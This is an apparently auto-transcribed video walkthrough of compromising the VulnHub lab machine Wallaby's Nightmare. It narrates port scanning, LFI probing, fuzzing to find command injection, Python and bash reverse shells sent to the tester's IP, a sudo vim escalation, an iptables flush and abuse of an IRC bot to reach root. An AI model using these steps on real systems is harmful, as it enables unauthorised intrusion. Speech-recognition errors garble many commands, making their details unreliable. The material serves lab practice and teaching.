Hey, what is up everybody? Here's Matt. So once again, today we're going to be rooting Wallaby's Nightmare from VulnHub. Super interesting machine. I enjoyed it a lot. And well, let's just get to it. So I've already ran my nmap scan. Here you see as always. The tag PN to tell nmap not to perform any ping scan. That is we're effectively telling nmap the host is already up, right? There's no need to like a ping sweep to discover if the host is up or not. We use tag SV to perform a service version detection scan, and the C appended to it, that is a shorthand for tag SC that will run some default scripts for each service found, right? We have -p- that will scan the whole range of ports, which is from 1 to 65,535. T5 is the fastest way inside the timing templates, which is from 1 to 5. Again, we'll disable DNS resolution. Here I invoke my variable T, which I defined just yet. With the IP of my target, right, which is 192.168.37.196, and then I save the results to a file called general on nmap. So we have OpenSSH 7.2 P2 for Ubuntu, and in the port 80 Apache HTTPD 2.4.18. These are the default scripts nmap runs, right? And actually we have another one which is 6667 for IRC, but it's filtered, so I think we won't be able to do anything. For example here, I mean we don't see any output. Let's try nmap. Nope, nothing is filtered. Okay, so here's the website, and this is out of the history. So let me just matcheck here, and this is now the CDF rules, which is welcome to the Wallaby source timer 2-part series VM. A few tips: fuzzing is your friend. Tmux can be useful for many things. Your environment matters. Good luck and have fun. Let's start it. There you go. So what the heck is this? Some guy named Matsek is trying to penetrate my server. The user must not know I'm the Ray Wallaby. Let's observe him for now. Maybe I could learn about him from his behavior. Well, first thing I see is that we have an argument, which is page, and it's defined as home. So maybe we can post that. We in the source code, I just hit Ctrl U. We have some method post. Create element action. I mean, it's not anything related to some kind of information leakage or something like that, just the way the page works, right? So we can try, I don't know, let me try something like that first, just to see if there are some errors. Says, dude, Matse, what are you trying over here? Okay, so it doesn't exist. We could try, for example, this is pretty common in LFI, like ATC pathology, just like this at first. Okay, well, let's add some fast traversal dots. And well, I mean, look at this. It looks like there is indeed the contents of the ATC pathology, and here it says. This is what we call disinformation in the cybersecurity world. Are you learning anything new here, Matsek? And disinformation, I mean, that makes me think that this is not accurate, right? That is not a real file, and this is might be a honeypot or some kind of trap, you know. Just to confirm, I like to try, for example, etc group, And it says that some fish stuff you're trying there, Matsek, buddy. You must think Wallaby counts like a monkey. I better get to securing this SQL injection though. Okay, so maybe here's a SQL injection. But it says, Wallaby caught you trying an LFI, you gotta be sneakier, difficulty level has increased. Let me try again. And you'll note that this is not working anymore, right? Let me strip that S off. Nope, it's not working. Now, you might think, and if you, for example, what I first did when I did the box was to fuzz directly on page. So imagine the my surprise when after maybe 5 seconds of fuzzing, it just started erroring out. And I thought the machine like died, like the brute force was too hard, something like that. And I reset the machine. I deleted from disk and reinstall it. But that's not the issue actually. So we can now go ahead and map. Perform our nmap scan once again. We'll find something out. Something different. Well, look at that. So we have that port 80 isn't there anymore. We have 680, right? So 60,080. Let's try that. All right, so 60,080. Let me remove all of this and strip the S off. And well, it says, holy moly, this guy Matsep wants me. Glad I moved to a different port so I could work more securely. As we all know, security by obscurity is the way to go. And thinking that one will find the key you put under your doormat. I are smart. And it's putting a key under the doormat, literally. So, this is security by obscurity. It looks like there's some emulation of an IDS. And of course a honeypot, as we saw before. And well, obviously we can find the new location of this. I mean, I can imagine this would work properly with load balancers and all this stuff. And well, basically it says this. So I like to try once again with page. Nope. Page equals home. Once again, there's nothing at all. Home AA. Once again. Once again. Maybe I can try now. etc pass LED. Gives me the content again. What about group? Nice try, Matsek buddy. This vector is patched. So this is a very different answer. And I'm seeing that I can do like several attempts and it's not like blocking me anymore or changing ports. So I like to go with fuzzing from here. And well, look at that. I'm gonna be using FFU since it's my preferred tool for fuzzing. Tag C to get a colored output. Tag U for the URL. This is my IP. Let me add 680. We're gonna be fuzzing here in page fuzz. Let me just add quotation marks. I'm gonna be using a word list from user share their posterior word lists directory list 2.3 medium.txt and 200 threads. So from here I'm gonna be starting filtering by size FS because there are a lot of results that have this size 899, and if I can imagine what it is, I'd say it's this one. Like, nice try Matsek body, this vector's patch. Literally all this is like, it weighs like 899 bytes or something like that. So I'm going to filter that out. And well, we have different things in here. So we have CGI bin contact. Let me check that. We have contact. Alright, so we have the contact page in here. Contact me with all your win or whining at Wallaby and Wallaby that Wallaby. What else do we have here? For example, this CVS entries. Let me pause this. What the hell? Let me pause this. And nice try, Matic, buddy. This Victor's patched. It looks like well, I don't know why it shows a different like size, because at the end of the day it is interpreting this slash as a LFI attack, right? So we have home index mailer, home index. Let me check mailer first. Mailer coming soon, guys. Okay, let us always check the source code, and it says here page mailer and mail equals mail. Wallaby message goes here. Send mail a button, which is not in there. Obviously, it's coming soon. Better finish implementing this so Matsec can send me all his loser complaints. Okay, so we can mailer and mail, right? So I don't know, try to emulate what the format told you do, like mail, mail equals mail, Wallaby asked, but that didn't work. So I came back to my fuzzer, and so page equals mailer and mail equals, and let's pause from there. Let me remove this filter for a moment. Now I can add another one, filter size, this time 1085. And well, look at that. I mean, well, since these are a lot of repeated sizes, let me just remove them as well. The hell is like this? Arch, call, date, df there, end export. Fine, those looks like commands, right? For example, if I use date, what will I get? Wednesday, December. If I do IT, if I do who am I, etc., etc. So we do have remote command execution, right? With this in mind, I like to check, for example, if I have Python 3 with which Python 3, we do have Python 3. And do we have Python? Like Python 2, but in Python? Yep. Just to know, because I can go here to payload all the things to reverse shell cheat sheet.md and go to Python and copy this payload, paste it in here. Let me specify my IP here, which is 192.168.57.183, I think it is, and 4444. So let me SMBLP 4444, right? And let us go. Look at that, we have a reverse shell. So let me stabilize it. So I'm going to be using script def null c bash stty raw minus echo fg reset xterm, and now I'm going to be exporting term for xterm. Now I can Control C and Control L freely and add your name. What is that? Matsec. Okay, that's my name. Let me cd in here. The hell? cd s1 like this. Well, let me honeypot. Look at that, PHP echo and a false etc pass LED, right? What else? Mailer. Look at that, it's getting a mail and it's passing it over to a system function. And if we would have used netcat, it would have printed out. Like, how are you gonna use netcat so obviously? Come on, man, this is all in deluxe. And that's okay. What else? Nothing else, I think. Cut blacklist. You are so predictable. You won't wait a machine like this. Can you see your move and your IP? Well, look at that. I mean, if we set BL, post BL, and file exist level 1, system sudo IP tables, destination port J drop, sleep for 60 seconds, and then I don't know what that is doing, to be honest. But basically, this is the script in charge of like literally dropping the 80 port and enabling the 60,080 port for us to continue the CDF, right? So that's cool. Let me etc pass LED, enumerate the actual users. And we have Wallaby, Waldo, IRCD, and I don't do this so often when I get a shell as tag data, because it usually doesn't work, right? But in this case it does, and this is a good teaching. As a pen testers, we need to literally try everything at hand, right? So we have sudo L. This is the sudoers permission, and we see that we can execute as being IP tables as every user with no pass LED, even as root. But unfortunately, we can escalate our privileges with this binary. All right. While we can escalate to Waldo with no password using Vim. And if you don't know this, you can go to get the fuck out bins, GTFO bins on GitHub, and use, for example, Vim. Well, look for Vim. And well, let me see. And sudo. So we can use sudo tac u. We will do that later. Sudo tac u Waldo, and when we're in, we can, well, just a command line, just like that, basically. No, I'll be explaining it to you guys how to do this later, because first we need to focus on this. Now we can use sudo IP tables L to list. Look at that. This is basically saying, okay, accept any connection where the source is from localhost and the destination is anywhere for IRCD, while you will drop head when the source is anywhere and the destination is anywhere. That is the reason why we are seeing our IRC as filtered. Right now we can remove this, and I mean, we have two options, right? Like, we can simply remove him. That would be like sudo this and F for flush. That will effectively flush it and remove every rule, firewall rule. Right. Let me, and then 2168, 37. What else was it? 186. And there you go. We're connecting to IRC. All right. And another thing we can do here is like to enable it, not by default, but create a rule to do it, like sudo IP tables a input, and I'm going to be specifying over TCP and the port is going to be 6667, and J accept. This is just for learning sake. That will be effectively create a rule that explicitly allows our connection from anywhere to anywhere, right? Now that we're here, we should try several things. Obviously, we can and we want to. Well, now that we do this, let me escalate actually my privileges to Waldo. So I can do something like that. And sudo. And when we specify the tag u, that means that we're running as another user, right? Otherwise, it would just run as tag data. So like this, and then I can specify colon to like enter the interactive mode and do something like this, and bin sh or bin bash, and there you go. We're effectively Waldo. Sudo tag l. We need a password. We don't have it. Let me stty rows 45 columns 189. I will be resize our screen to avoid any error. And let us go to our folder and let's see cut higher this I. If you don't know what this says, you can look it up on Google. But IRSSI, it's like a tool that will help us connect to any IRC server. So we can do something like this, like, so let me define my variable t once again, 37196, and then like this. Since the port 6667 is the default for IRC, we don't need to specify it, but we can do it with port, and we can log with a nickname as we want. So we can use, for example, whatever. I don't care. So from here, you can Google this, like, to see the commands you can execute in here. You can use /help to see all the commands, but I'm just gonna be straight up, right? Like, we can use a /list, and we see there's one channel, right? So let me join it, and Wallaby's chat, and now I'm logged in, and I see there are 3 users logged, which is Waldo, Wallaby's bot, and me, whatever, right? Well, this script will manage a new session called RC, and we'll send keys, which I don't know what it is, but we can see this like list mx list sessions. And we see one session called DRC with one window and all stuff. But before, let me see something here, because we have an IRC folder, config. Yeah, there's nothing to worry about in here, I think. Well, maybe we need to cut that out. Yeah, there's no such there's not any kind of important information here, but we can also look at this. So let me check Wallaby's folder. Let me use lsalive, and I like to check www meetings. There's nothing in there. IRCC, we already saw there's nothing there. Let me check Sopel, and we can start looking like, what is Sopel, IRC, what is. Let me use DuckDuckGo, because otherwise it will ask me for some captchas. It says Sopel, the Python IRC bot. So it looks like a bot, right? And in here, let me go there. Remember, this is a trick, bash trick that will grab the very last argument passed to the very last command, right? In this case, this whole path. So now that we're here, let me use, for example, cat default cfg, Wallaby's bot, or Waldo. Okay. Let me strings default.db, and it is not leaking any kind of information. What is malware domains? Well, looks like it's a filter to prevent sharing malicious URLs. Present. Strings wallabies bot.db, whatever. There's nothing there. At sopale.pid, there's nothing there. Oh yes, 943. Let me check logs, and we can see exceptions, and it says file not found error. Well, this is a reverse shell, so well, I only can imagine that this is like logs from the machines creator testing, because I did not use this in IRC yet. So let me check raw, and well, this looks like little and regular logs, like raw logs, literally. So this is allowed. Let me see how many lines are there here. We have a 40,000. We have a lot. So let me go grepping out. So egrep -v gonna be pink and pong. Go out. I'm gonna be fake to disappear these lines. Fake. What else? Fake. Wallaby's bot. App. Gonna be join topic and who. And well, okay, I'm starting to see interesting information. So there's a bot. I mean, this looks like the bot saying we can use help.help and then run ls. But let me try that, like .help private message. Again, if you didn't know, you'd need to do a little bit of research, but you can do query and Wallaby's bot to see the private messages. Now look at this. You can see more info about any of these commands that help. So I don't know, a person, I mean, I'm seeing this here, right? So I'm gonna be running that as well. Run ls. Hold on, you are in Waldo. Okay, so I'm not Waldo, obviously. But and I can impersonate it because Waldo is already logged in. Remember that? So what we can do is take advantage of what we just see before, which is we have a session that we can tmx attach. That way we can look at that, get to the session, and we're logged in. So let me lists. I mean, this is kind of bugged, so I just can hit exit, and then I can exit out as well. And instead of whatever, let me use Waldo this time. And let me list. I think a list or list. Yes, list. So join Wallaby's chat. Run ls, for example. Okay, look at that. Let me run ID. Wallaby. Okay, we have command execution. Testing pwd home Wallaby. Right, let me use lsla. And well, look at that. It looks like if we try to chain more, I mean 2 or more commands, we won't get I mean we'll get this error. Now let me try to enclose it into quotation marks. Doesn't work as well. Nope, doesn't work. So what I like to try now is to see if I can wait. Let me use TCP dump. Sudo. And there you go. So what I'm doing here is I'm using TCP dump and to disable DNS resolution and the I to specify the interface, which is ETH0 and ICMP, because I just want to listen to ICMP traces, right? So what about if we try ping C1 192.168.37.183, I think it is. Yeah, look at that. Even though we get this error, we're able to get the traces and execute commands. I mean, it's working. But yes, we'll see an error. But what about if we just ncmvlp 5555? What about if we just send us a reverse shell? So that run, and I'm gonna be using bash c, typical one. Then bash I interactive mode diff tcp 192.168.37.183 over port 5555, extra direction, and there you go. So we're now Wallaby. Let me use sudo tag l as always, and well, we have no pass down LD, all and all, like that's in the sudoers file, right? So sudo su root id then bash. Well, Python 3c import pty.spawn bin bash. Maybe that'll work. There you go. So yeah, root. Let me go to root folders, roots folder, ls cat flag. And congratulations, that's it for today. So again, I think this was a super interesting machine. I think I learned a lot, and I hope you guys too. So I'll see you later, and I hope you guys enjoyed it too. Feel free to let some comments if you want to recommend anything to my channel and me personally. I'll be happy to hear you out. Bye bye.